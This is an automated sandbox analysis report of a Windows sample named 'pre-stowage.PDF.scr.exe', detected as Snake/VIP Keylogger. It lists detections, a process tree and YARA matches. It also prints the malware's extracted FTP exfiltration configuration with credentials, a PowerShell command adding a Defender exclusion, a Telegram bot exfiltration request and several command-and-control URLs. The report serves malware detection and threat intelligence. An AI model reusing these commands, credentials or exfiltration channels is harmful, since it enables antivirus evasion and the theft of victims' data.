
Windows Analysis Report
pre-stowage.PDF.scr.exe

Overview

General Information

Sample name: pre-stowage.PDF.scr.exe
Analysis ID: 1576531
MD5: 68dfd91fce9ad3d728a7c25716990edd
SHA1: 6a6843531a77b77892813360b3daf0b0bbfea8c2
SHA256: 525248e53005e0ec5a39b4aa00c2323e9f5be5a256ddd944707aba1b3dedba58
Tags: exe, user-threatcat_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • pre-stowage.PDF.scr.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe" MD5: 68DFD91FCE9AD3D728A7C25716990EDD)
    • powershell.exe (PID: 816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7268 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • pre-stowage.PDF.scr.exe (PID: 6896 cmdline: "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe" MD5: 68DFD91FCE9AD3D728A7C25716990EDD)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "FTP", "Username": "belogswork@inhanoi.net.vn", "Password": "usarmy11111@@", "FTP Server": "ftp://ftp.inhanoi.net.vn/", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
        • 0x2d91c:$a1: get_encryptedPassword
        • 0x2dc21:$a2: get_encryptedUsername
        • 0x2d728:$a3: get_timePasswordChanged
        • 0x2d823:$a4: get_passwordField
        • 0x2d932:$a5: set_encryptedPassword
        • 0x2efbf:$a7: get_logins
        • 0x2ef22:$a10: KeyLoggerEventArgs
        • 0x2eb87:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security

Source | Rule | Description | Author | Strings
0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
                • 0x2bd1c:$a1: get_encryptedPassword
                • 0x2c021:$a2: get_encryptedUsername
                • 0x2bb28:$a3: get_timePasswordChanged
                • 0x2bc23:$a4: get_passwordField
                • 0x2bd32:$a5: set_encryptedPassword
                • 0x2d3bf:$a7: get_logins
                • 0x2d322:$a10: KeyLoggerEventArgs
                • 0x2cf87:$a11: KeyLoggerEventArgsEventHandler
0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
                • 0x39bad:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x39250:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x394ad:$a4: \Orbitum\User Data\Default\Login Data
                • 0x39e8c:$a5: \Kometa\User Data\Default\Login Data

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", ParentImage: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe, ParentProcessId: 7128, ParentProcessName: pre-stowage.PDF.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", ProcessId: 816, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", ParentImage: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe, ParentProcessId: 7128, ParentProcessName: pre-stowage.PDF.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe", ProcessId: 816, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T08:33:54.680510+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49706 | 172.67.177.134 | 443 | TCP
2024-12-17T08:34:03.417453+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49718 | 172.67.177.134 | 443 | TCP
2024-12-17T08:33:50.274773+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49702 | 193.122.130.0 | 80 | TCP
2024-12-17T08:33:53.068957+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49702 | 193.122.130.0 | 80 | TCP
2024-12-17T08:33:55.975234+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49713 | 193.122.130.0 | 80 | TCP
2024-12-17T08:33:58.850266+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49715 | 193.122.130.0 | 80 | TCP

AV Detection

Source: pre-stowage.PDF.scr.exe | Avira: detected
Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "belogswork@inhanoi.net.vn", "Password": "usarmy11111@@", "FTP Server": "ftp://ftp.inhanoi.net.vn/", "Version": "4.4"}
Source: pre-stowage.PDF.scr.exe | ReversingLabs: Detection: 28%
Source: pre-stowage.PDF.scr.exe | Virustotal: Detection: 30%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: pre-stowage.PDF.scr.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: pre-stowage.PDF.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49703 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49733 version: TLS 1.2
Source: pre-stowage.PDF.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: DjCW.pdb source: pre-stowage.PDF.scr.exe
Source: Binary string: DjCW.pdbSHA256 source: pre-stowage.PDF.scr.exe

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2018/12/2024%20/%2003:49:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 193.122.130.0 193.122.130.0
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49715 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49713 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49718 -> 172.67.177.134:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49706 -> 172.67.177.134:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 07:34:18 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3769722427.00000000061D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros4
Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1319452030.0000000003021000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20a
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002ABA000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002980000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002980000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49733 version: TLS 1.2

                System Summary

                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: initial sample | Static PE information: Filename: pre-stowage.PDF.scr.exe
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_02E23E28
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_02E2E104
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_02E26F90
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_079565C0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795DDF0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_07957CAA
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795F418
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795E3E8
